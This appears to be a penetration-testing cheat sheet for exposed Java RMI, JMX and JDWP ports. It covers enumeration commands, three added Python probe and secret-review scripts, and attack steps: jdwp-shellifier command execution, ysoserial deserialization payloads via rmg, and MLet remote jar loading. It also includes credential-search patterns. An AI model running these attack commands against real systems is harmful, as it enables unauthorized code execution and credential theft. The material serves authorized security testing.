Java RMI, JMX and JDWP
Default Ports: 1099 (RMI registry), 9010/9999 (JMX; there is no fixed default, the port is whatever com.sun.management.jmxremote.port was set to), 5005 (JDWP)
Java RMI, JMX, and JDWP expose Java remote objects, management operations, and debugging interfaces. Remote JMX is itself served over RMI (the jmxremote port is an RMI registry with a jmxrmi binding), so the RMI notes below apply to JMX ports as well. In pentests, unauthenticated Java management ports can reveal runtime data, MBeans, system properties, credentials, and sometimes code execution paths.
Connect
RMI Registry
RMI registry enumeration identifies bound names, the host:port of each remote object, and well-known remote object classes. Add --ssl when the registry is TLS-wrapped.
nmap -p 1099 -sV target.com
rmg enum target.com 1099
rmg enum target.com 1099 --ssl
JMX
JMX exposes JVM and application management data.
nmap -p 9010,9999,1099,7199 -sV target.com
java -jar jmxterm.jar -l target.com:9010
java -jar jmxterm.jar -l service:jmx:rmi:///jndi/rmi://target.com:1099/jmxrmi
JDWP
JDWP is a debug protocol with no authentication: anyone who completes the handshake controls the JVM. It should never be exposed in production. A JDWP listener echoes the 14-byte handshake string back to the client.
nmap -p 5005 -sV target.com
printf 'JDWP-Handshake' | nc -v target.com 5005
Recon
Service Detection with Nmap
Scan common Java application, management, and debug ports. For JDWP, jdwp-version only reads the VM banner; jdwp-info injects and runs a Java class inside the target JVM, so treat it as active exploitation rather than detection.
nmap -p 1099,5005,7001,7199,8000,8009,8080,9010,9999 -sV target.com
nmap -p 1099 --script rmi-dumpregistry target.com
nmap -p 5005 --script jdwp-version target.com
Product Context
Nearby services help identify Tomcat, JBoss, WebLogic, Cassandra, Kafka, or custom JVM apps.
nmap -p 80,443,8080,8081,8443,9990 -sV target.com
httpx -u http://target.com:8080 -title -tech-detect -status-code
TLS and Binding Review
The RMI registry only hands out references: each bound object lives on its own endpoint, often a dynamically allocated port, and the JMX RMI connector listens on yet another port (fixed only when com.sun.management.jmxremote.rmi.port is set). rmg enum prints the host:port of every bound object and whether it is TLS-wrapped; a full port scan finds RMI listeners the registry does not mention, and those must be reachable too or the client call fails.
rmg enum target.com 1099 --scan-action list
nmap -p- --min-rate 5000 target.com
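To tell which of the ports a full scan turns up are RMI listeners (the registry itself, the JMX connector, or a per-object endpoint), the script below speaks the first bytes of the Java RMI stream protocol: it sends the JRMI greeting, expects ProtocolAck followed by the client endpoint as the server sees it, sends its own (empty) endpoint and then a Ping. This is an added example, not code from remote-method-guesser or nmap; host and port are command-line arguments, TLS wrapping is optional, and SAMPLE_ACK is a hand-constructed reply so the parser can be checked offline.

```python
"""Confirm that a port speaks the Java RMI stream protocol (JRMP).

Added example for this page, not code from remote-method-guesser or nmap.
Exchange: client sends "JRMI" + version 2 + StreamProtocol; an RMI listener
answers ProtocolAck and the client endpoint as the server sees it; the client
sends its own endpoint and may then Ping. SAMPLE_ACK is hand-constructed.
"""
import socket
import ssl
import struct
import sys

JRMI_MAGIC = b"JRMI"
VERSION = 2
STREAM_PROTOCOL = 0x4b
PROTOCOL_ACK = 0x4e            # 0x4f would be ProtocolNotSupported
PING, PING_ACK = 0x52, 0x53


def build_hello():
    """Client greeting: magic, version (2-byte), protocol byte."""
    return JRMI_MAGIC + struct.pack(">HB", VERSION, STREAM_PROTOCOL)


def build_endpoint(host="", port=0):
    """EndpointIdentifier as DataOutputStream writes it: writeUTF (2-byte length + bytes) then writeInt."""
    h = host.encode("utf-8")
    return struct.pack(">H", len(h)) + h + struct.pack(">I", port)


def parse_protocol_ack(data):
    """Return (host, port) from ProtocolAck + EndpointIdentifier; raise on any other first byte."""
    if not data or data[0] != PROTOCOL_ACK:
        raise ValueError("not a JRMP ProtocolAck: %r" % data[:1])
    (n,) = struct.unpack(">H", data[1:3])
    host = data[3:3 + n].decode("utf-8")
    (port,) = struct.unpack(">I", data[3 + n:7 + n])
    return host, port


def connect(host, port, timeout, tls):
    """Plain or TLS-wrapped socket; certificate checks are off because this only fingerprints the service."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=host)
    return sock


def probe(host, port, timeout=5.0, tls=False):
    """Live probe. Returns a dict; raises if the port does not answer as JRMP."""
    with connect(host, port, timeout, tls) as sock:
        rfile = sock.makefile("rb")            # read(n) blocks until n bytes or EOF
        sock.sendall(build_hello())
        head = rfile.read(3)                   # ack byte + 2-byte host length
        if len(head) < 3 or head[0] != PROTOCOL_ACK:
            raise RuntimeError("%s:%d is not JRMP (got %r)" % (host, port, head))
        (n,) = struct.unpack(">H", head[1:3])
        seen_host, seen_port = parse_protocol_ack(head + rfile.read(n + 4))
        sock.sendall(build_endpoint() + bytes([PING]))   # our (empty) endpoint, then Ping
        ping_ack = rfile.read(1) == bytes([PING_ACK])
        return {"jrmp": True, "tls": tls, "client_seen_as": (seen_host, seen_port), "ping_ack": ping_ack}


# Constructed reply: what an RMI listener sends to a client it sees as 172.17.0.1 (the JDK writes port 0).
SAMPLE_ACK = bytes([PROTOCOL_ACK]) + build_endpoint("172.17.0.1", 0)


if __name__ == "__main__":
    target, port = sys.argv[1], int(sys.argv[2])
    print(probe(target, port, tls=(len(sys.argv) > 3 and sys.argv[3] == "--ssl")))
```

Run it as `python3 jrmp_probe.py target.com 1099` (append `--ssl` for a TLS-wrapped endpoint) against each candidate port from the nmap output; a port that returns ProtocolNotSupported or closes the connection is not an RMI stream endpoint. The host in client_seen_as is useful on its own: it tells you which address the server sees you coming from, which matters for localhost-only registries and for proxied setups.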
Enumeration
RMI Enumeration
Enumerate bound names, methods, and endpoint classes. rmg known takes a class name from the enum output (not a host and port) and prints what is known about that remote object type, including its remote methods.
rmg enum target.com 1099
rmg guess target.com 1099
rmg known javax.management.remote.rmi.RMIServerImpl_Stub
JMX Enumeration
Use JMX to list domains, MBeans, attributes, and operations. jmxterm commands are typed at its prompt (or piped to stdin with -n); attributes and operations are addressed with -b and the MBean ObjectName.
java -jar jmxterm.jar -l target.com:9010
domains
beans
info -b java.lang:type=Runtime
get -b java.lang:type=Runtime SystemProperties
JDWP Enumeration
Completing the handshake (the listener echoes the 14 bytes back) is proof of unauthenticated debug access. jdwp-version reads the VM banner only; jdwp-info injects and executes a Java class inside the target JVM to collect system information, so it is exploitation rather than enumeration and needs the corresponding authorization.
printf 'JDWP-Handshake' | nc -v target.com 5005
nmap -p 5005 --script jdwp-version target.com
nmap -p 5005 --script jdwp-info target.com
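The handshake proves the port is JDWP; the script below, an added example rather than code from nmap or jdwp-shellifier, goes one step further and sends the VirtualMachine.Version command, which is read-only and returns the JDWP and JVM versions without injecting anything into the target. Host and port are command-line arguments; SAMPLE_REPLY is a hand-constructed reply with invented version strings so the packet parsing can be exercised offline.

```python
"""JDWP handshake plus a VirtualMachine.Version request, with reply parsing.

Added example for this page, not code from nmap, jdwp-shellifier or the JDK.
Host and port are placeholders; SAMPLE_REPLY is constructed by hand from the
JDWP wire format so the parsing can be exercised offline.
"""
import socket
import struct
import sys

HANDSHAKE = b"JDWP-Handshake"   # 14 bytes sent by the client and echoed verbatim by the VM
VIRTUAL_MACHINE = 1             # command set
VERSION = 1                     # command: VirtualMachine.Version
FLAG_REPLY = 0x80


def build_command(packet_id, cmdset, cmd, data=b""):
    """Command packet: length(4) id(4) flags(1) cmdset(1) cmd(1), then data."""
    return struct.pack(">IIBBB", 11 + len(data), packet_id, 0, cmdset, cmd) + data


def parse_header(raw):
    """Parse an 11-byte header. A reply carries a 2-byte error code where a command carries cmdset/cmd."""
    length, packet_id, flags = struct.unpack(">IIB", raw[:9])
    if flags & FLAG_REPLY:
        (error,) = struct.unpack(">H", raw[9:11])
        return {"length": length, "id": packet_id, "reply": True, "error": error}
    cmdset, cmd = struct.unpack(">BB", raw[9:11])
    return {"length": length, "id": packet_id, "reply": False, "cmdset": cmdset, "cmd": cmd}


def read_string(buf, off):
    """JDWP string: 4-byte big-endian length followed by UTF-8 bytes, no terminator."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    off += 4
    return buf[off:off + n].decode("utf-8"), off + n


def parse_version_reply(body):
    """Reply data: description(string) jdwpMajor(int) jdwpMinor(int) vmVersion(string) vmName(string)."""
    description, off = read_string(body, 0)
    major, minor = struct.unpack(">II", body[off:off + 8])
    vm_version, off = read_string(body, off + 8)
    vm_name, _ = read_string(body, off)
    return {"description": description, "jdwpMajor": major, "jdwpMinor": minor,
            "vmVersion": vm_version, "vmName": vm_name}


def probe(host, port, timeout=5.0):
    """Live probe: complete the handshake, then ask the VM for its version (read-only; injects nothing)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(HANDSHAKE)
        rfile = sock.makefile("rb")            # read(n) blocks until n bytes or EOF
        echo = rfile.read(len(HANDSHAKE))
        if echo != HANDSHAKE:
            raise RuntimeError("no JDWP handshake echo, got %r" % echo)
        sock.sendall(build_command(1, VIRTUAL_MACHINE, VERSION))
        hdr = parse_header(rfile.read(11))
        body = rfile.read(hdr["length"] - 11)
        if hdr["error"]:
            raise RuntimeError("JDWP error code %d" % hdr["error"])
        return parse_version_reply(body)


def _string(s):
    b = s.encode("utf-8")
    return struct.pack(">I", len(b)) + b


# Constructed sample reply (packet id 1, error 0); the version strings are invented for the demo.
SAMPLE_REPLY_BODY = (_string("Java Debug Wire Protocol (Reference Implementation) version 11.0")
                     + struct.pack(">II", 11, 0) + _string("17.0.2") + _string("OpenJDK 64-Bit Server VM"))
SAMPLE_REPLY = struct.pack(">IIBH", 11 + len(SAMPLE_REPLY_BODY), 1, FLAG_REPLY, 0) + SAMPLE_REPLY_BODY


def demo():
    """Parse the constructed reply exactly as probe() would parse a live one."""
    hdr = parse_header(SAMPLE_REPLY[:11])
    assert hdr["reply"] and hdr["error"] == 0 and hdr["length"] == len(SAMPLE_REPLY)
    return parse_version_reply(SAMPLE_REPLY[11:])


if __name__ == "__main__":
    if len(sys.argv) == 3:
        print(probe(sys.argv[1], int(sys.argv[2])))
    else:
        print(demo())
```

`python3 jdwp_version.py target.com 5005` prints the parsed version dict; with no arguments it parses the constructed sample. The packet id is echoed in the reply, so a real client matches replies to requests by id; the error code field is where a VM would report, for example, that a command is not supported.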
JVM Secret Review
JVM arguments and system properties may contain credentials: -D flags with database or keystore passwords, API tokens, and JDBC or LDAP URLs with user:password embedded in them.
get -b java.lang:type=Runtime InputArguments
get -b java.lang:type=Runtime SystemProperties
Attack Vectors
Exposed RMI Registry
RMI exposure may allow method discovery, deserialization testing, or unsafe remote object access. rmg call takes the bound name and the Java method signature as options and the call arguments positionally, written as Java expressions.
rmg enum target.com 1099
rmg call target.com 1099 '"arg"' --bound-name bound-name --signature 'String method-name(String arg)'
Unauthenticated JMX
Unauthenticated JMX can expose MBeans and dangerous operations (MLet loading, diagnostic commands, application-specific operations). List a domain with beans -d, then inspect each ObjectName with info -b.
java -jar jmxterm.jar -l target.com:9010
beans
beans -d com.example
info -b com.example:type=mbean-name
MLet Abuse
Some JMX deployments allow loading remote MBeans through javax.management.loading.MLet: its getMBeansFromURL operation fetches an MLET file from a URL and loads the jar it references, which is remote code execution. jmxterm has no createMBean command, so on its own it can only use an MLet that is already registered; look for one in the beans output and invoke it with run.
java -jar jmxterm.jar -l target.com:9010
beans
run -b mlet-objectname getMBeansFromURL mlet-url
JDWP Code Execution
Exposed JDWP can be used to execute code inside the JVM. jdwp-shellifier sets a breakpoint (java.net.ServerSocket.accept by default, changeable with --break-on) and runs the command when that breakpoint is hit, so the application must be made to reach that method, for example by connecting to a port it listens on. The script reports that exec() succeeded, not the command's output, so use a side effect (file write, callback) to confirm.
jdwp-shellifier.py -t target.com -p 5005 --cmd "id"
Deserialization Risk
RMI and JMX may expose Java deserialization paths. On JDKs with JEP 290 (8u121, 7u131, 6u141 and later) the registry and DGC apply serialization filters, so a gadget chain usually has to go through an application-defined remote method that takes an object parameter; rmg enum reports the filter status. The payload command runs blind, so use an out-of-band callback rather than id.
rmg serial target.com 1099 CommonsCollections6 'id' --yso /path/to/ysoserial.jar
java -jar ysoserial.jar CommonsCollections6 'id' > payload.bin
Post-Exploitation
Runtime Review
Collect JVM version, arguments, properties, and application names.
get -b java.lang:type=Runtime VmName
get -b java.lang:type=Runtime VmVersion
get -b java.lang:type=Runtime InputArguments
get -b java.lang:type=Runtime SystemProperties
Credential Review
Search saved jmxterm output and any retrieved configs for secrets.
grep -nEi 'password|secret|token|jdbc|ldap|aws|apikey' jmx-output.txt
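The grep above works on raw output. The following Python, an added example and not jmxterm or JDK code, applies the same review to the InputArguments and SystemProperties values of java.lang:type=Runtime (the JVM Secret Review checks earlier on this page) with two additions a grep misses: it also catches passwords embedded as user:password@ in JDBC or LDAP URLs, and it redacts every value it flags so the findings can go straight into the report. The sample arguments and properties are constructed for the demo, and the key patterns are this example's own heuristics, not a complete list.

```python
"""Flag credential-bearing JVM input arguments and system properties, redacting values for the report.

Added example for this page, not jmxterm or JDK code. It takes the InputArguments
list and SystemProperties map as Python values (copied out of the jmxterm output);
the sample values below are constructed for the demo and the key patterns are this
example's own heuristics, not a complete list.
"""
import re

# key names that normally hold a secret
SECRET_KEY_RE = re.compile(r"password|passwd|pwd|secret|token|api[_.-]?key|credential|access[_.-]?key", re.I)
# user:password@ userinfo inside a URL-shaped value (jdbc, ldap, amqp, ...)
USERINFO_RE = re.compile(r"://([^/@:\s]+):([^/@\s]+)@")
# keys or values that describe infrastructure worth noting even when not secret
INTERESTING_RE = re.compile(r"jdbc|ldap|aws|kerberos|jmxremote|keystore|truststore|javaagent|jdwp", re.I)


def redact(value):
    """Keep the first two characters so a finding can be matched to its source; mask the rest."""
    return value[:2] + "*" * (len(value) - 2)


def classify(key, value):
    """Return ('secret', redacted) / ('interesting', value) / None for one key=value pair."""
    if SECRET_KEY_RE.search(key):
        return "secret", redact(value)
    m = USERINFO_RE.search(value)
    if m:                                   # redact only the password part of user:password@
        return "secret", value.replace(m.group(2), redact(m.group(2)), 1)
    if INTERESTING_RE.search(key) or INTERESTING_RE.search(value):
        return "interesting", value
    return None


def split_argument(arg):
    """-Dkey=value -> (key, value); other flags (-agentlib:jdwp=..., -Xmx2g) keep the flag as key."""
    body = arg[2:] if arg.startswith("-D") else arg
    key, _, value = body.partition("=")
    return key, value


def review(input_arguments, system_properties):
    """Walk both sources and return a list of findings with secrets already redacted."""
    findings = []
    for arg in input_arguments:
        key, value = split_argument(arg)
        hit = classify(key, value)
        if hit:
            findings.append({"source": "InputArguments", "key": key, "kind": hit[0], "value": hit[1]})
    for key, value in system_properties.items():
        hit = classify(key, str(value))
        if hit:
            findings.append({"source": "SystemProperties", "key": key, "kind": hit[0], "value": hit[1]})
    return findings


def report(findings):
    """One line per finding, suitable for pasting into evidence notes."""
    return ["%-11s %-16s %s = %s" % (f["kind"], f["source"], f["key"], f["value"]) for f in findings]


# Constructed sample data, shaped like java.lang:type=Runtime InputArguments / SystemProperties.
SAMPLE_INPUT_ARGUMENTS = [
    "-Xmx2g",
    "-Dcom.sun.management.jmxremote.port=9010",
    "-Dcom.sun.management.jmxremote.authenticate=false",
    "-Dspring.datasource.password=Sup3rS3cret!",
    "-Djavax.net.ssl.trustStorePassword=changeit",
    "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005",
]
SAMPLE_SYSTEM_PROPERTIES = {
    "java.version": "17.0.2",
    "spring.datasource.url": "jdbc:postgresql://dbadmin:Pgpass123@db.internal:5432/app",
    "app.api.token": "eyJhbGciOiJIUzI1NiJ9.demo.demo",
    "user.dir": "/opt/app",
}


if __name__ == "__main__":
    print("\n".join(report(review(SAMPLE_INPUT_ARGUMENTS, SAMPLE_SYSTEM_PROPERTIES))))
```

On the sample data this reports the two -D passwords, the API token and the password inside the JDBC URL as secrets (values masked), and the jmxremote.authenticate=false flag and the jdwp agent line as interesting, which is exactly the set a reviewer wants in the misconfiguration table without ever writing a cleartext credential into the report.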
Evidence Collection
Save minimal proof of exposure and accessible operations; prefer read-only checks for evidence (jdwp-version rather than jdwp-info, which executes code in the target).
rmg enum target.com 1099 > rmi-enum.txt
nmap -p 5005 --script jdwp-version target.com -oN jdwp-version.txt
Useful Tools
| Tool | Purpose |
|---|---|
| nmap | Port and script detection (rmi-dumpregistry, jdwp-version, jdwp-info) |
| remote-method-guesser (rmg) | RMI enumeration, method guessing, calls and deserialization tests |
| jmxterm | JMX client |
| jdwp-shellifier | JDWP exploitation testing |
| ysoserial | Java deserialization payloads |
| nc | JDWP handshake check |
Security Misconfigurations
| Misconfiguration | Risk |
|---|---|
| RMI exposed | Remote object and deserialization attack surface |
| JMX unauthenticated | JVM and app management exposure |
| JDWP exposed | Debug access and code execution |
| JVM secrets in properties | Credential leakage |
| Dynamic RMI ports exposed | Unexpected management access |
| No network restriction | Internal management exposed broadly |